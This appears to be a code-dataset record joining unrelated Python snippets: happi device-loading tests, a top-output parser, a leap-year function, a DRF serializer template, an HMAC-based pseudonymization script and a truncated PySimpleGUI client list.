(Two entries for \"motor3\" differ in the value of `active` field.\n # A single entry for `det` has `active==True`.)\n ((\"det\", \"motor3\"), (\"det\", \"motor3\"), {\"active\": True}, True, \"\"),\n ((\"det\", \"motor3\"), (\"det\", \"motor3\"), {\"active\": False}, False,\n \"No devices with name 'det' were found in Happi database.\"),\n ((\"motor3\",), (\"motor3\",), {\"active\": False}, True, \"\"),\n # Verify that valid device names are accepted\n ((\"det\", [\"motor\", \"motor3_new\"]), (\"det\", \"motor3_new\"), {}, True, \"\"),\n # Invalid new device name\n ((\"det\", [\"motor\", \"Motor\"]), (\"det\", \"motor\"), {}, False, \"may consist of lowercase letters, numbers\"),\n ((\"det\", [\"motor\", \"moTor\"]), (\"det\", \"motor\"), {}, False, \"may consist of lowercase letters, numbers\"),\n ((\"det\", [\"motor\", \"_motor\"]), (\"det\", \"motor\"), {}, False, \"may consist of lowercase letters, numbers\"),\n ((\"det\", [\"motor\", \" motor\"]), (\"det\", \"motor\"), {}, False, \"may consist of lowercase letters, numbers\"),\n ((\"det\", [\"motor\", \"motor \"]), (\"det\", \"motor\"), {}, False, \"may consist of lowercase letters, numbers\"),\n ((\"det\", [\"motor\", \"motor new\"]), (\"det\", \"motor\"), {}, False, \"may consist of lowercase letters, numbers\"),\n ((\"det\", [\"motor\", \"motor_$new\"]), (\"det\", \"motor\"), {}, False, \"may consist of lowercase letters, numbers\"),\n ((\"det\", [\"motor\", \"2motor_$new\"]), (\"det\", \"motor\"), {}, False, \"may consist of lowercase letters, numbers\"),\n])\n# fmt: on\ndef test_load_devices_from_happi_1(tmp_path, monkeypatch, device_names, loaded_names, kw_args, success, errmsg):\n \"\"\"\n Tests for ``load_devices_from_happi``.\n \"\"\"\n _configure_happi(tmp_path, monkeypatch, json_devices=_happi_json_db_1)\n\n # Load as a dictionary\n if success:\n ns = {}\n dlist = load_devices_from_happi(device_names, namespace=ns, **kw_args)\n assert len(ns) == len(loaded_names), str(ns)\n for d in loaded_names:\n 
assert d in ns\n assert set(dlist) == set(loaded_names)\n else:\n with pytest.raises(Exception, match=errmsg):\n ns = {}\n load_devices_from_happi(device_names, namespace=ns, **kw_args)\n\n # Load in local namespace\n def _test_loading(device_names, loaded_names):\n if success:\n load_devices_from_happi(device_names, namespace=locals(), **kw_args)\n for d in loaded_names:\n assert d in locals()\n else:\n with pytest.raises(Exception, match=errmsg):\n load_devices_from_happi(device_names, namespace=locals(), **kw_args)\n\n _test_loading(device_names=device_names, loaded_names=loaded_names)\n\n\ndef test_load_devices_from_happi_2_fail(tmp_path, monkeypatch):\n \"\"\"\n Function ``load_devices_from_happi``: parameter ``namespace`` is required and must be of type ``dict``.\n \"\"\"\n _configure_happi(tmp_path, monkeypatch, json_devices=_happi_json_db_1)\n\n # Missing 'namespace' parameter\n with pytest.raises(TypeError, match=\"missing 1 required keyword-only argument: 'namespace'\"):\n load_devices_from_happi([\"det\", \"motor\"])\n\n # Incorrect type of 'namespace' parameter\n with pytest.raises(TypeError, match=\"Parameter 'namespace' must be a dictionary\"):\n load_devices_from_happi([\"det\", \"motor\"], namespace=[1, 2, 3])\n",
"step-ids": [
5,
6,
7,
8,
9
]
}
|
[
5,
6,
7,
8,
9
] |
#!/usr/local/bin/python3
"""
Copyright (c) 2015-2019 Ad Schellevis <[email protected]>
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
1. Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
THIS SOFTWARE IS PROVIDED ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES,
INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY
AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,
OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
POSSIBILITY OF SUCH DAMAGE.
--------------------------------------------------------------------------------------
returns system activity (top)
"""
import collections
import tempfile
import subprocess
import os
import sys
import ujson
if __name__ == '__main__':
    # Collect `top` output into a structured result:
    #   result['headers'] : the summary lines printed above the process table
    #   result['details'] : one dict per process-table row, keyed by column name
    fieldnames = None           # column names of the process table, prefixed with 'PID'
    field_max_width = dict()    # widest value seen per column, for plain-text alignment
    result = {'headers': [], 'details': []}
    is_header = True            # True while still reading the summary block above the table
    tidpid = dict()             # thread id -> process id
    # Build the TID -> PID map from `procstat -ath`; the code assumes the first
    # two whitespace-separated columns are PID and TID.
    for line in subprocess.run(['/usr/bin/procstat','-ath'], capture_output=True, text=True).stdout.split('\n'):
        parts = line.split(maxsplit=2)
        if len(parts) > 1:
            tidpid[parts[1]] = parts[0]
    # grab second display so that CPU time data appears
    sp = subprocess.run(['/usr/bin/top','-aHSTn','-d2','999999'], capture_output=True, text=True)
    # '-d2' requests two displays; keep the last chunk after the first two
    # blank-line breaks (the refreshed second display's output).
    topData = sp.stdout.strip().split('\n\n',2)[-1]
    for line in topData.split('\n'):
        # end of header, start of top detection
        if line.find('USERNAME') > -1 and line.find('COMMAND') > -1:
            is_header = False
        if is_header:
            # parse headers from top command, add to result
            if len(line.strip()) > 0:
                result['headers'].append(line)
        else:
            # parse details including fieldnames (leave original)
            if fieldnames is None:
                # First table line is the column-header row; prepend 'PID'
                # because the data rows start with a thread id that we map
                # back to its process id below.
                fieldnames = ['PID'] + line.split()
            else:
                # maxsplit keeps the trailing COMMAND column (which may
                # contain spaces) in one piece.
                tmp = line.split(maxsplit=10)
                record = {'C': '0'}  # default for the CPU column; NOTE(review): a row with fewer columns than fieldnames would still raise IndexError below -- confirm column counts always match
                for field_id in range(len(fieldnames)):
                    fieldname = fieldnames[field_id]
                    if field_id == 0: # PID
                        # translate top's TID back to the owning PID ('' if unknown)
                        record[fieldname] = tidpid[tmp[0]] if tmp[0] in tidpid else ''
                    else:
                        record[fieldname] = tmp[field_id - 1]
                    # track the widest value per column for plain-text output
                    if fieldname not in field_max_width or field_max_width[fieldname] < len(record[fieldname]):
                        field_max_width[fieldname] = len(record[fieldname])
                result['details'].append(record)
    if len(sys.argv) > 1 and sys.argv[1] == 'json':
        # output as json
        print(ujson.dumps(result))
    else:
        # output plain (reconstruct data)
        for header_line in result['headers']:
            print (header_line)
        print ("\n")
        if fieldnames is not None:
            # Build a %-format string with one left-aligned, dict-keyed slot
            # per column, sized from the widest value observed (+1 padding).
            format_str = ""
            header_fields = {}
            for fieldname in fieldnames:
                format_str = '%s %%(%s)-%ds'%(format_str,fieldname, field_max_width[fieldname]+1)
                header_fields[fieldname] = fieldname
            print (format_str % header_fields)
            for detail_line in result['details']:
                print (format_str % detail_line)
|
normal
|
{
"blob_id": "f4ae34be2be2b47b3394e6da751c53c51a1c3174",
"index": 6678,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nif __name__ == '__main__':\n fieldnames = None\n field_max_width = dict()\n result = {'headers': [], 'details': []}\n is_header = True\n tidpid = dict()\n for line in subprocess.run(['/usr/bin/procstat', '-ath'],\n capture_output=True, text=True).stdout.split('\\n'):\n parts = line.split(maxsplit=2)\n if len(parts) > 1:\n tidpid[parts[1]] = parts[0]\n sp = subprocess.run(['/usr/bin/top', '-aHSTn', '-d2', '999999'],\n capture_output=True, text=True)\n topData = sp.stdout.strip().split('\\n\\n', 2)[-1]\n for line in topData.split('\\n'):\n if line.find('USERNAME') > -1 and line.find('COMMAND') > -1:\n is_header = False\n if is_header:\n if len(line.strip()) > 0:\n result['headers'].append(line)\n elif fieldnames is None:\n fieldnames = ['PID'] + line.split()\n else:\n tmp = line.split(maxsplit=10)\n record = {'C': '0'}\n for field_id in range(len(fieldnames)):\n fieldname = fieldnames[field_id]\n if field_id == 0:\n record[fieldname] = tidpid[tmp[0]] if tmp[0\n ] in tidpid else ''\n else:\n record[fieldname] = tmp[field_id - 1]\n if fieldname not in field_max_width or field_max_width[\n fieldname] < len(record[fieldname]):\n field_max_width[fieldname] = len(record[fieldname])\n result['details'].append(record)\n if len(sys.argv) > 1 and sys.argv[1] == 'json':\n print(ujson.dumps(result))\n else:\n for header_line in result['headers']:\n print(header_line)\n print('\\n')\n if fieldnames is not None:\n format_str = ''\n header_fields = {}\n for fieldname in fieldnames:\n format_str = '%s %%(%s)-%ds' % (format_str, fieldname, \n field_max_width[fieldname] + 1)\n header_fields[fieldname] = fieldname\n print(format_str % header_fields)\n for detail_line in result['details']:\n print(format_str % detail_line)\n",
"step-3": "<mask token>\nimport collections\nimport tempfile\nimport subprocess\nimport os\nimport sys\nimport ujson\nif __name__ == '__main__':\n fieldnames = None\n field_max_width = dict()\n result = {'headers': [], 'details': []}\n is_header = True\n tidpid = dict()\n for line in subprocess.run(['/usr/bin/procstat', '-ath'],\n capture_output=True, text=True).stdout.split('\\n'):\n parts = line.split(maxsplit=2)\n if len(parts) > 1:\n tidpid[parts[1]] = parts[0]\n sp = subprocess.run(['/usr/bin/top', '-aHSTn', '-d2', '999999'],\n capture_output=True, text=True)\n topData = sp.stdout.strip().split('\\n\\n', 2)[-1]\n for line in topData.split('\\n'):\n if line.find('USERNAME') > -1 and line.find('COMMAND') > -1:\n is_header = False\n if is_header:\n if len(line.strip()) > 0:\n result['headers'].append(line)\n elif fieldnames is None:\n fieldnames = ['PID'] + line.split()\n else:\n tmp = line.split(maxsplit=10)\n record = {'C': '0'}\n for field_id in range(len(fieldnames)):\n fieldname = fieldnames[field_id]\n if field_id == 0:\n record[fieldname] = tidpid[tmp[0]] if tmp[0\n ] in tidpid else ''\n else:\n record[fieldname] = tmp[field_id - 1]\n if fieldname not in field_max_width or field_max_width[\n fieldname] < len(record[fieldname]):\n field_max_width[fieldname] = len(record[fieldname])\n result['details'].append(record)\n if len(sys.argv) > 1 and sys.argv[1] == 'json':\n print(ujson.dumps(result))\n else:\n for header_line in result['headers']:\n print(header_line)\n print('\\n')\n if fieldnames is not None:\n format_str = ''\n header_fields = {}\n for fieldname in fieldnames:\n format_str = '%s %%(%s)-%ds' % (format_str, fieldname, \n field_max_width[fieldname] + 1)\n header_fields[fieldname] = fieldname\n print(format_str % header_fields)\n for detail_line in result['details']:\n print(format_str % detail_line)\n",
"step-4": "#!/usr/local/bin/python3\n\n\"\"\"\n Copyright (c) 2015-2019 Ad Schellevis <[email protected]>\n All rights reserved.\n\n Redistribution and use in source and binary forms, with or without\n modification, are permitted provided that the following conditions are met:\n\n 1. Redistributions of source code must retain the above copyright notice,\n this list of conditions and the following disclaimer.\n\n 2. Redistributions in binary form must reproduce the above copyright\n notice, this list of conditions and the following disclaimer in the\n documentation and/or other materials provided with the distribution.\n\n THIS SOFTWARE IS PROVIDED ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES,\n INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY\n AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE\n AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF\n SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS\n INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN\n CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)\n ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE\n POSSIBILITY OF SUCH DAMAGE.\n\n --------------------------------------------------------------------------------------\n returns system activity (top)\n\"\"\"\nimport collections\nimport tempfile\nimport subprocess\nimport os\nimport sys\nimport ujson\n\nif __name__ == '__main__':\n fieldnames = None\n field_max_width = dict()\n result = {'headers': [], 'details': []}\n is_header = True\n tidpid = dict()\n for line in subprocess.run(['/usr/bin/procstat','-ath'], capture_output=True, text=True).stdout.split('\\n'):\n parts = line.split(maxsplit=2)\n if len(parts) > 1:\n tidpid[parts[1]] = parts[0]\n # grab second display so that CPU time data appears\n sp = 
subprocess.run(['/usr/bin/top','-aHSTn','-d2','999999'], capture_output=True, text=True)\n topData = sp.stdout.strip().split('\\n\\n',2)[-1]\n for line in topData.split('\\n'):\n # end of header, start of top detection\n if line.find('USERNAME') > -1 and line.find('COMMAND') > -1:\n is_header = False\n if is_header:\n # parse headers from top command, add to result\n if len(line.strip()) > 0:\n result['headers'].append(line)\n else:\n # parse details including fieldnames (leave original)\n if fieldnames is None:\n fieldnames = ['PID'] + line.split()\n else:\n tmp = line.split(maxsplit=10)\n record = {'C': '0'}\n for field_id in range(len(fieldnames)):\n fieldname = fieldnames[field_id]\n if field_id == 0: # PID\n record[fieldname] = tidpid[tmp[0]] if tmp[0] in tidpid else ''\n else:\n record[fieldname] = tmp[field_id - 1]\n\n if fieldname not in field_max_width or field_max_width[fieldname] < len(record[fieldname]):\n field_max_width[fieldname] = len(record[fieldname])\n result['details'].append(record)\n\n if len(sys.argv) > 1 and sys.argv[1] == 'json':\n # output as json\n print(ujson.dumps(result))\n else:\n # output plain (reconstruct data)\n for header_line in result['headers']:\n print (header_line)\n print (\"\\n\")\n if fieldnames is not None:\n format_str = \"\"\n header_fields = {}\n for fieldname in fieldnames:\n format_str = '%s %%(%s)-%ds'%(format_str,fieldname, field_max_width[fieldname]+1)\n header_fields[fieldname] = fieldname\n\n print (format_str % header_fields)\n for detail_line in result['details']:\n print (format_str % detail_line)\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
def is_leap_year(date):
    """Return True if *date* (a year number) is a leap year, False otherwise.

    Gregorian rule: every year divisible by 4 is a leap year, except
    century years, which are leap only when divisible by 400.
    """
    # Century years are the special case: 1900 is not a leap year, 2000 is.
    if date % 100 == 0:
        return date % 400 == 0
    # Non-century years follow the plain divisible-by-4 rule.
    return date % 4 == 0
|
normal
|
{
"blob_id": "496d52a984bb8c0e72948ab0c8db5e6035427a68",
"index": 5209,
"step-1": "<mask token>\n",
"step-2": "def is_leap_year(date):\n if date % 400 == 0:\n return True\n elif date % 100 == 0:\n return False\n elif date % 4 == 0:\n return True\n else:\n return False\n",
"step-3": "#returns true if given date is a leap year, false otherwise\n\ndef is_leap_year(date):\n\t#if divisible by 400, definitely a leap year\n\tif date % 400 == 0: return True \n\t#if divisible by 100 (and not 400), not a leap year\n\telif date % 100 == 0: return False \n\t#divisible by 4 and not by 100? leap year\n\telif date % 4 == 0: return True\n\t#otherwise not a leap year \n\telse : return False\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
{% comment %}
Code-generator template: emits one rest_framework ModelSerializer subclass per
model of the target app. `from_module_import` (from code_generator_tags) loads
the app's model classes into the `models` context variable, and `indent_items`
renders the quoted field-name tuple body at 12-space indentation. The inline
{% templatetag opencomment %} pairs placed at line ends swallow the trailing
newlines around the for-loop tags so the generated file keeps clean spacing.
Everything between comment tags renders to nothing, so output is unchanged.
{% endcomment %}{% load code_generator_tags %}from rest_framework.serializers import ModelSerializer
{% from_module_import app.name|add:'.models' models %}{% comment %}
{% endcomment %}{% for model in models %}
class {{ model.name }}Serializer(ModelSerializer):
    class Meta:
        model = {{ model.name }}
        depth = 1
        fields = (
            {% indent_items model.field_names 12 quote='simple' %}
        )
        read_only_fields = (){% comment %}
{% endcomment %}{% endfor %}
|
normal
|
{
"blob_id": "888ec915d89f1fd8fd6465f1035f7c658af78596",
"index": 6166,
"step-1": "{% load code_generator_tags %}from rest_framework.serializers import ModelSerializer\n{% from_module_import app.name|add:'.models' models %}{% comment %}\n{% endcomment %}{% for model in models %}\n\n\nclass {{ model.name }}Serializer(ModelSerializer):\n class Meta:\n model = {{ model.name }}\n depth = 1\n fields = (\n {% indent_items model.field_names 12 quote='simple' %}\n )\n read_only_fields = (){% comment %}\n{% endcomment %}{% endfor %}\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
# This implementation of EPG takes data as XML and produces corresponding pseudonymized data
from lxml import etree
from utils import generalize_or_supress
from hashlib import sha256
from count import getLast, saveCount
import pickle
from hmac import new
from random import random
from json import loads
from bigchain import putonBlockChain, findRecord
def EPGAinit(IDPath):
	"""Derive a pseudonym ``Hi`` and group index ``GUi`` from an XML identity.

	Reads the quasi-identifier attributes of the XML root at *IDPath*,
	generalizes/suppresses each one, and hashes the concatenation into a
	group id ``Gi``. A per-group counter (persisted via getLast/saveCount)
	is mapped through a quadratic residue modulo a fixed prime to obtain
	``GUi``, and ``Hi`` is an HMAC-SHA256 over (Gi || GUi) keyed with the
	generalized identifiers.

	Returns:
		tuple[str, int]: (Hi hex digest, GUi group index).

	Raises:
		RuntimeError: if the group's counter queue is non-empty — the
			original code fell through this branch with ``count`` unassigned
			and later crashed with NameError; we fail loudly instead.
		Exception: 'Prime Exceeded' when the counter reaches the modulus.
	"""
	# Close the file deterministically instead of leaking the handle.
	with open(IDPath, 'rt') as identity_file:
		idt = identity_file.read()
	Qti = etree.fromstring(idt)

	print('Loading Identifiers')
	print('Quasi Specifiers..')
	print(', '.join(Qti.keys()))
	print('Applying EPGAD_Init on Qti')

	# Generalize or suppress each (attribute-name, attribute-value) pair.
	gQti = [generalize_or_supress(i[1], i[0]) for i in zip(Qti.keys(), Qti.values())]
	hmacKey = ''.join(gQti)
	Gi = sha256(hmacKey.encode()).hexdigest()

	countObj = getLast(Gi)
	GiObj = pickle.loads(countObj.GiObj)

	if not GiObj['cQueue'].empty():
		# BUG FIX: previously this path left ``count`` unassigned, so the
		# check against ``prime`` below raised NameError. The intended
		# behavior here is not shown in this file — TODO confirm whether a
		# count should instead be drawn from the queue.
		raise RuntimeError('counter queue for group is not empty; cannot allocate a new count')

	# Allocate the next count for this group (0 on first use) and persist it.
	GiObj['count'] = GiObj.get('count', -1) + 1
	count = GiObj['count']
	countObj.GiObj = pickle.dumps(GiObj)
	saveCount(countObj)

	prime = 179426549
	if count >= prime:
		raise Exception('Prime Exceeded')
	# Map the counter through a quadratic residue so GUi hides the order
	# in which pseudonyms were issued.
	res = count ** 2 % prime
	GUi = res if count <= prime / 2 else prime - res

	Hi = new(Gi.encode() + str(GUi).encode(), hmacKey.encode(), sha256).hexdigest()
	return Hi, GUi
def EPGAD(ReportPath, Hi=None, GUi=None):
	"""Pseudonymize the JSON report at *ReportPath* and publish it.

	Blanks the subject's display name, replaces the subject reference with
	the pseudonym *Hi* (a fresh random one is derived when None), puts the
	record on the blockchain, and reads the transaction back.
	"""
	if Hi is None:
		Hi = sha256(str(random()).encode()).hexdigest()

	with open(ReportPath, 'rt') as report_file:
		jsnld = loads(report_file.read())
	print('Report Loaded')
	print('Finding Subject Information')

	if 'subject' in jsnld:
		print('Subject Information Found')
		subject = jsnld['subject']
		if 'display' in subject:
			subject['display'] = ""
			print('Subject Display Found and Suppressed')
		if 'reference' in subject:
			subject['reference'] = Hi
			print('Replacing Identifier with ', Hi)

	print('Placing Record Asset on BlockChain')
	print()
	txid = putonBlockChain(jsnld, Hi, GUi)
	print('Status OK. Retrieving Transaction')
	findRecord(txid)
if __name__ == "__main__":
	# Demo run against the bundled sample identity and report files.
	pseudonym, group_index = EPGAinit('sampleIdentity.xml')
	EPGAD('sampleReport.json', pseudonym, group_index)
|
normal
|
{
"blob_id": "8f554166c28fe4c9a093568a97d39b6ba515241b",
"index": 3196,
"step-1": "<mask token>\n\n\ndef EPGAD(ReportPath, Hi=None, GUi=None):\n if Hi == None:\n Hi = sha256(str(random()).encode()).hexdigest()\n jsn = open(ReportPath, 'rt').read()\n jsnld = loads(jsn)\n print('Report Loaded')\n print('Finding Subject Information')\n if 'subject' in jsnld.keys():\n print('Subject Information Found')\n if 'display' in jsnld['subject'].keys():\n jsnld['subject']['display'] = ''\n print('Subject Display Found and Suppressed')\n if 'reference' in jsnld['subject'].keys():\n jsnld['subject']['reference'] = Hi\n print('Replacing Identifier with ', Hi)\n print('Placing Record Asset on BlockChain')\n print()\n txid = putonBlockChain(jsnld, Hi, GUi)\n print('Status OK. Retrieving Transaction')\n findRecord(txid)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef EPGAinit(IDPath):\n idt = open(IDPath, 'rt').read()\n Qti = etree.fromstring(idt)\n print('Loading Identifiers')\n print('Quasi Specifiers..')\n print(', '.join(Qti.keys()))\n print('Applying EPGAD_Init on Qti')\n gQti = [generalize_or_supress(i[1], i[0]) for i in zip(Qti.keys(), Qti.\n values())]\n hmacKey = ''\n for i in gQti:\n hmacKey += i\n Gi = sha256(hmacKey.encode()).hexdigest()\n countObj = getLast(Gi)\n GiObj = pickle.loads(countObj.GiObj)\n if GiObj['cQueue'].empty():\n if 'count' not in GiObj.keys():\n GiObj['count'] = 0\n count = 0\n else:\n GiObj['count'] += 1\n count = GiObj['count']\n countObj.GiObj = pickle.dumps(GiObj)\n saveCount(countObj)\n prime = 179426549\n if count >= prime:\n raise Exception('Prime Exceeded')\n else:\n res = count ** 2 % prime\n if count <= prime / 2:\n GUi = res\n else:\n GUi = prime - res\n Hi = new(Gi.encode() + str(GUi).encode(), hmacKey.encode(), sha256\n ).hexdigest()\n return Hi, GUi\n\n\ndef EPGAD(ReportPath, Hi=None, GUi=None):\n if Hi == None:\n Hi = sha256(str(random()).encode()).hexdigest()\n jsn = open(ReportPath, 'rt').read()\n jsnld = loads(jsn)\n print('Report Loaded')\n print('Finding Subject Information')\n if 'subject' in jsnld.keys():\n print('Subject Information Found')\n if 'display' in jsnld['subject'].keys():\n jsnld['subject']['display'] = ''\n print('Subject Display Found and Suppressed')\n if 'reference' in jsnld['subject'].keys():\n jsnld['subject']['reference'] = Hi\n print('Replacing Identifier with ', Hi)\n print('Placing Record Asset on BlockChain')\n print()\n txid = putonBlockChain(jsnld, Hi, GUi)\n print('Status OK. Retrieving Transaction')\n findRecord(txid)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef EPGAinit(IDPath):\n idt = open(IDPath, 'rt').read()\n Qti = etree.fromstring(idt)\n print('Loading Identifiers')\n print('Quasi Specifiers..')\n print(', '.join(Qti.keys()))\n print('Applying EPGAD_Init on Qti')\n gQti = [generalize_or_supress(i[1], i[0]) for i in zip(Qti.keys(), Qti.\n values())]\n hmacKey = ''\n for i in gQti:\n hmacKey += i\n Gi = sha256(hmacKey.encode()).hexdigest()\n countObj = getLast(Gi)\n GiObj = pickle.loads(countObj.GiObj)\n if GiObj['cQueue'].empty():\n if 'count' not in GiObj.keys():\n GiObj['count'] = 0\n count = 0\n else:\n GiObj['count'] += 1\n count = GiObj['count']\n countObj.GiObj = pickle.dumps(GiObj)\n saveCount(countObj)\n prime = 179426549\n if count >= prime:\n raise Exception('Prime Exceeded')\n else:\n res = count ** 2 % prime\n if count <= prime / 2:\n GUi = res\n else:\n GUi = prime - res\n Hi = new(Gi.encode() + str(GUi).encode(), hmacKey.encode(), sha256\n ).hexdigest()\n return Hi, GUi\n\n\ndef EPGAD(ReportPath, Hi=None, GUi=None):\n if Hi == None:\n Hi = sha256(str(random()).encode()).hexdigest()\n jsn = open(ReportPath, 'rt').read()\n jsnld = loads(jsn)\n print('Report Loaded')\n print('Finding Subject Information')\n if 'subject' in jsnld.keys():\n print('Subject Information Found')\n if 'display' in jsnld['subject'].keys():\n jsnld['subject']['display'] = ''\n print('Subject Display Found and Suppressed')\n if 'reference' in jsnld['subject'].keys():\n jsnld['subject']['reference'] = Hi\n print('Replacing Identifier with ', Hi)\n print('Placing Record Asset on BlockChain')\n print()\n txid = putonBlockChain(jsnld, Hi, GUi)\n print('Status OK. Retrieving Transaction')\n findRecord(txid)\n\n\nif __name__ == '__main__':\n Hi, GUi = EPGAinit('sampleIdentity.xml')\n EPGAD('sampleReport.json', Hi, GUi)\n",
"step-4": "from lxml import etree\nfrom utils import generalize_or_supress\nfrom hashlib import sha256\nfrom count import getLast, saveCount\nimport pickle\nfrom hmac import new\nfrom random import random\nfrom json import loads\nfrom bigchain import putonBlockChain, findRecord\n\n\ndef EPGAinit(IDPath):\n idt = open(IDPath, 'rt').read()\n Qti = etree.fromstring(idt)\n print('Loading Identifiers')\n print('Quasi Specifiers..')\n print(', '.join(Qti.keys()))\n print('Applying EPGAD_Init on Qti')\n gQti = [generalize_or_supress(i[1], i[0]) for i in zip(Qti.keys(), Qti.\n values())]\n hmacKey = ''\n for i in gQti:\n hmacKey += i\n Gi = sha256(hmacKey.encode()).hexdigest()\n countObj = getLast(Gi)\n GiObj = pickle.loads(countObj.GiObj)\n if GiObj['cQueue'].empty():\n if 'count' not in GiObj.keys():\n GiObj['count'] = 0\n count = 0\n else:\n GiObj['count'] += 1\n count = GiObj['count']\n countObj.GiObj = pickle.dumps(GiObj)\n saveCount(countObj)\n prime = 179426549\n if count >= prime:\n raise Exception('Prime Exceeded')\n else:\n res = count ** 2 % prime\n if count <= prime / 2:\n GUi = res\n else:\n GUi = prime - res\n Hi = new(Gi.encode() + str(GUi).encode(), hmacKey.encode(), sha256\n ).hexdigest()\n return Hi, GUi\n\n\ndef EPGAD(ReportPath, Hi=None, GUi=None):\n if Hi == None:\n Hi = sha256(str(random()).encode()).hexdigest()\n jsn = open(ReportPath, 'rt').read()\n jsnld = loads(jsn)\n print('Report Loaded')\n print('Finding Subject Information')\n if 'subject' in jsnld.keys():\n print('Subject Information Found')\n if 'display' in jsnld['subject'].keys():\n jsnld['subject']['display'] = ''\n print('Subject Display Found and Suppressed')\n if 'reference' in jsnld['subject'].keys():\n jsnld['subject']['reference'] = Hi\n print('Replacing Identifier with ', Hi)\n print('Placing Record Asset on BlockChain')\n print()\n txid = putonBlockChain(jsnld, Hi, GUi)\n print('Status OK. 
Retrieving Transaction')\n findRecord(txid)\n\n\nif __name__ == '__main__':\n Hi, GUi = EPGAinit('sampleIdentity.xml')\n EPGAD('sampleReport.json', Hi, GUi)\n",
"step-5": "# This implementation of EPG takes data as XML and produces corresponding pseudonymized data\n\nfrom lxml import etree\nfrom utils import generalize_or_supress\nfrom hashlib import sha256\nfrom count import getLast, saveCount\nimport pickle\nfrom hmac import new\nfrom random import random\nfrom json import loads\nfrom bigchain import putonBlockChain, findRecord\n\ndef EPGAinit(IDPath):\n\tidt = open(IDPath,'rt').read()\n\n\tQti = etree.fromstring(idt)\n\n\tprint('Loading Identifiers')\n\tprint('Quasi Specifiers..')\n\tprint(', '.join(Qti.keys()))\n\tprint('Applying EPGAD_Init on Qti')\n\t\n\tgQti = [generalize_or_supress(i[1],i[0]) for i in zip(Qti.keys(),Qti.values())]\n\n\thmacKey = \"\"\n\n\tfor i in gQti:\n\t\thmacKey+=i\n\n\tGi = sha256(hmacKey.encode()).hexdigest()\n\n\tcountObj = getLast(Gi)\n\tGiObj = pickle.loads(countObj.GiObj)\n\n\tif GiObj['cQueue'].empty():\n\t\tif 'count' not in GiObj.keys():\n\t\t\tGiObj['count'] = 0\n\t\t\tcount = 0\n\t\telse:\n\t\t\tGiObj['count']+=1\n\t\t\tcount = GiObj['count']\n\t\tcountObj.GiObj = pickle.dumps(GiObj)\n\t\tsaveCount(countObj)\n\n\tprime = 179426549\n\n\tif count >= prime:\n\t\t raise Exception('Prime Exceeded')\n\n\telse:\n\t\tres = count**2%prime\n\t\tif count <= prime/2:\n\t\t\tGUi = res\n\t\telse:\n\t\t\tGUi = prime - res\n\n\tHi = new(Gi.encode() + str(GUi).encode() , hmacKey.encode() , sha256).hexdigest()\n\treturn Hi, GUi\n\n\ndef EPGAD(ReportPath, Hi=None, GUi = None):\n\tif Hi == None:\n\t\tHi = sha256(str(random()).encode()).hexdigest()\n\tjsn = open(ReportPath, 'rt').read()\n\tjsnld = loads(jsn)\n\tprint('Report Loaded')\n\tprint('Finding Subject Information')\n\tif 'subject' in jsnld.keys():\n\t\tprint('Subject Information Found')\n\t\tif 'display' in jsnld['subject'].keys():\n\t\t\tjsnld['subject']['display'] = \"\"\n\t\t\tprint('Subject Display Found and Suppressed')\n\t\tif 'reference' in jsnld['subject'].keys():\n\t\t\tjsnld['subject']['reference'] = Hi\n\t\t\tprint('Replacing 
Identifier with ', Hi)\n\n\tprint('Placing Record Asset on BlockChain')\n\tprint()\n\ttxid = putonBlockChain(jsnld,Hi, GUi)\n\tprint('Status OK. Retrieving Transaction')\n\tfindRecord(txid)\n\nif __name__ == \"__main__\":\n\tHi, GUi = EPGAinit('sampleIdentity.xml')\n\tEPGAD('sampleReport.json', Hi, GUi)\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
import PySimpleGUI as sg
class TelaLisatrClientes():
    """PySimpleGUI window that displays a read-only list of clients."""

    def __init__(self):
        # Window is built lazily by init_components().
        self.__window = None

    def init_components(self, lista_clientes):
        """Build the window layout populated with *lista_clientes*."""
        rows = [
            [sg.Text('Dados do cliente')],
            [sg.Listbox(values=lista_clientes, size=(60, 10))],
            [sg.Submit()],
        ]
        self.__window = sg.Window('Lista de clientes').Layout(rows)

    def lista_clientes(self, lista_clientes):
